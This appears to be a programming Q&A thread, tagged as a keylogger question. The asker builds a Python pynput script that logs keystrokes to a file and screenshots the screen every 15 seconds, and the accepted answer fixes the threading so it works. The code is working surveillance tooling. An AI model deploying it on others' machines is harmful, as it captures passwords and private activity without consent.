# How do I make pynput.keyboard run as a Thread?

Tags: python, multithreading, keylogger

I wrote a script to capture keystrokes using Pynput, It went alright until I wanted to take screenshots every 15 seconds while capturing keystrokes(threading).

I read about pynput.keyboard Documents and saw that A keyboard listener is a threading.Thread, and yet I was unable to do it, I think I managed to create the two threads but it is not entering the 'getKey' function I don't know why.

```
from PIL import ImageGrab
import time 
from pynput.keyboard import Key, Listener
from pynput import keyboard
import logging
import os 
import threading


def main():
    listener = keyboard.Listener(onpress=getKey)
    listener.start()
    thread2 = threading.Thread(target=takeScreenshot, args=())
    thread2.start()
    thread2.join()


def getKey(key):
    print(key)
    key = fixKey(key)
    file = open('log.txt', 'a')
    file.write(key.replace('\'', '') + '')
    file.close()

def fixKey(key):
    key = str(key)
    if key == 'Key.space':
        return ' '
    elif key == 'Key.enter':
        return '\n'
    return key

def takeScreenshot():
    time.sleep(15)
    image = ImageGrab.grab()
    now = time.strftime("%d-%m-%Y" + ' ' + "%H-%M-%S")
    image.save(now + '.png')

main()
```

As I explained it does not even creates the file 'log.txt' only take a screenshot after 15sec.
Thank you!

Answer (score 4, accepted):

This is the correct way to use listener from the official [docs](https://pythonhosted.org/pynput/keyboard.html#monitoring-the-keyboard)

if you need to capture screenshot every 15 seconds you should run a thread with a while loop to run in the background continuously

here is the code:

```
from PIL import ImageGrab
import time 
from pynput.keyboard import Key, Listener
from pynput import keyboard
import logging
import os 
import threading


def main():
    thread2 = threading.Thread(target=takeScreenshot, args=())
    thread2.start()

    with Listener(on_press=getKey) as listener:
        listener.join()


def getKey(key):
    print(key)
    key = fixKey(key)
    file = open('log.txt', 'a')
    file.write(key.replace('\'', '') + '')
    file.close()

def fixKey(key):
    key = str(key)
    if key == 'Key.space':
        return ' '
    elif key == 'Key.enter':
        return '\n'
    return key

def takeScreenshot():
    # run contineous and take screenshot every 15 seconds
    while True:
        print('taking screenshot')
        image = ImageGrab.grab()
        now = time.strftime("%d-%m-%Y" + ' ' + "%H-%M-%S")
        image.save(now + '.png')
        time.sleep(15)


main()
```

Answer (score 1):

to use it in a non blocking way you should do it like this:

```
listener = Listener(on_press=on_press, on_release=on_release,suppress=True)
        listener.start()
```

this will create 1 thread that is always listening without blocking the whole code (in case you need to do things that are not related to a key) but this also can end up creating too many threads so make sure you only create it if it doesn't exist yet like this:

```
from pynput.keyboard import Key, Listener, Controller
listener = None
keyPressed = None

def on_press(key):
    if key == Key.enter:
        global saveFile
        saveFile = True  

def on_release(key):
    global keyPressed
    keyPressed = key.char


def CheckWhichKeyIsPressed():
    global listener

    if listener == None:  
        listener = Listener(on_press=on_press, on_release=on_release,suppress=True)
        listener.start()
```